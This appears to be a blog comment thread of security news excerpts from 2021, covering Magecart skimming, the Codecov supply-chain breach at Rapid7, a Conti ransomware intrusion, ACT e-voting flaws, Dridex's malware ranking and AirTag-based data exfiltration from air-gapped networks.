Operating with the primary intention of capturing and exfiltrating payment data, Magecart actors have embraced a wide range of attack vectors over the past several months to stay under the radar, avoid detection, and plunder data. From hiding card stealer code inside image metadata and carrying out IDN homograph attacks to plant web skimmers concealed within a website’s favicon file to using Google .
Analytics and Telegram as an exfiltration channel, the cybercrime syndicate has intensified in its efforts to compromise online stores.
Tomi Engdahl says:
Rapid7 source code, alert data accessed in Codecov supply chain attack https://www.zdnet.com/article/rapid7-source-code-alert-data-accessed-in-codecov-supply-chain-attack/
On April 15, 2021, Codecov, a provider of code coverage solutions, announced a supply chain incident in which a malicious party gained access to Codecovs Bash Uploader script and modified it, enabling the attacker to export data stored in environment variables on Codecov customers continuous integration (CI) systems to an attacker-controlled server.. A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7. These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
Tomi Engdahl says:
Conti Ransomware
https://thedfirreport.com/2021/05/12/conti-ransomware/
In April, we saw a threat actor go from an initial IcedID infection to deploying Conti ransomware domain wide in two days and 11 hours. The threat actors stayed dormant for most of this time, before jumping into action on an early Saturday morning. The hands on keyboard activity lasted for two and a half hours. They utilized RDP, PsExec, and Cobalt Strike to move laterally within the environment . before executing Conti in memory across all active systems.
Tomi Engdahl says:
Researchers found three flaws in ACT e-voting system that could affect election outcomes https://www.zdnet.com/article/researchers-find-three-flaws-in-act-e-voting-system-that-could-affect-election-outcomes/
Although system flaws didn’t change the outcome of the ACT’s 2020 election, they could in the future, with four Australian security researchers asking for access to the tech to help prevent such a scenario.. “Secretive, unverifiable systems like the ones used in the ACT 2020 election, make it relatively easy to change the recorded list of votes cast, in a way that observers cannot notice,” they said. “It also makes accidental errors more likely to remain undetected.
Tomi Engdahl says:
April 2021s Most Wanted Malware: Dridex Remains in Top Position Amidst Global Surge in Ransomware Attacks https://blog.checkpoint.com/2021/05/13/april-2021s-most-wanted-malware-dridex-remains-in-top-position-amidst-global-surge-in-ransomware-attacks/
Our latest Global Threat Index for April 2021 has revealed that for the first time, AgentTesla has ranked second in the Index, while the established Dridex trojan is still the most prevalent malware, having risen to the top spot in March after being seventh in February. This month, Dridex, a Trojan that targets the Windows platform, spread via QuickBooks Malspam Campaign. The phishing emails used QuickBookss branding and were trying to lure the user with fake payment notifications and invoices. The email content asked to download a malicious Microsoft Excel attachment that could cause the system to be infected with Dridex.
Tomi Engdahl says:
Using iPhones and AirTags to sneak data out of air-gapped networks https://blog.malwarebytes.com/reports/2021/05/using-iphones-and-airtags-to-sneak-data-out-of-air-gapped-networks/
Someone has found an extraordinary way to exfiltrate data by piggybacking data on the backs of unsuspecting iPhones. A researcher has found out that it is possible to upload arbitrary data from non-internet-connected devices by sending Bluetooth Low Energy (BLE) broadcasts to nearby Apple devices that will happily upload the data for you. To demonstrate their point, they released an ESP32 firmware that turns the micro-controller into an (upload only) modem. They also created a macOS application to retrieve, decode and display the uploaded data.